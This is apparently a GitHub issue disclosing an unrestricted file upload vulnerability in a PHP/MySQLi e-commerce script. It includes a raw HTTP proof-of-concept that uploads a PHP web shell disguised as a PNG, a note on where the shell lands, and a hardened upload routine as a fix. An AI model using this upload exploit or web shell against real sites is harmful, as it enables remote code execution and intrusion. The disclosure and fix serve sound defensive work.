Complete E-Commerce Site in PHP/MySQLi - Arbitrary file vulnerability uploading leads to command execution #3

Open
xuanluansec opened this issue Mar 20, 2024 · 1 comment

Comments

@xuanluansec

Complete E-Commerce Site in PHP/MySQLi - Arbitrary file vulnerability uploading leads to command execution

  • Author: onelastcrush

Vendor Homepage

Software Link

Overview

  • onelastcrush has discovered a vulnerability classified as critical in Complete E-Commerce Site in PHP/MySQLi V1.0. The function upload is affected. This operation will result in unrestricted uploads. Remote attacks can cause RCE.

Vulnerability Details

  • Complete E-Commerce Site in PHP/MySQLi V1.0
  • Vulnerable File: admin/products_photo.php
  • Parameter Names: filename
  • Attack Type: Remote

Description

  • A vulnerability, which was classified as critical, has been found in Complete E-Commerce Site in PHP/MySQLi. This issue affects the function upload. The manipulation with an unknown input leads to an unrestricted upload vulnerability.

Note

  • To exploit this vulnerability, users need to log in, and the website allows any user to register by default.

Proof of Concept (PoC):

POST /admin/products_photo.php HTTP/1.1
Host: www.ecommerce.com:8091
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------145108311014335905531894526533
Cookie: PHPSESSID=XXXXXXXXXX
Upgrade-Insecure-Requests: 1
Content-Length: 357

-----------------------------145108311014335905531894526533
Content-Disposition: form-data; name="photo"; filename="phpshell.php"
Content-Type: image/png

<?php system("dir");
-----------------------------145108311014335905531894526533
Content-Disposition: form-data; name="upload"

1
-----------------------------145108311014335905531894526533--

Location of vulnerabilities in source code

@xuanluansec
Author

Note: the uploaded PHP file is images/_xxxx.php, where xxxx is the current timestamp.
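
For maintainers fixing this class of bug, a hardened upload routine is sketched below as an added example; it is not code from the project or from the report. The function name `store_product_photo()` and the destination path are assumptions; the `photo` form field and the `images/` directory are taken from the report above.

```php
<?php
// Added example: hardened photo upload. store_product_photo() and the
// directory layout are hypothetical, not the project's own code.
declare(strict_types=1);

const ALLOWED_TYPES = [           // detected MIME type => extension we assign
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];
const MAX_BYTES = 2 * 1024 * 1024;

function store_product_photo(array $file, string $destDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }

    // Detect the type from the file's bytes. $file['type'] and $file['name']
    // are client-supplied: the PoC request sends image/png with a .php name.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    $ext  = is_string($mime) ? (ALLOWED_TYPES[$mime] ?? null) : null;
    if ($ext === null || getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not an accepted image');
    }

    // Server-chosen random name plus allowlisted extension: nothing from the
    // client filename survives, and the stored name is not derived from a
    // timestamp, so it cannot be guessed.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], rtrim($destDir, '/') . '/' . $name)) {
        throw new RuntimeException('could not store file');
    }
    return $name;
}

// Usage in the upload endpoint (path is an assumption):
// $stored = store_product_photo($_FILES['photo'], __DIR__ . '/../images');
```

Configuring the web server so that nothing under the upload directory is executed as PHP gives a second layer of protection if a validation step is ever bypassed.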
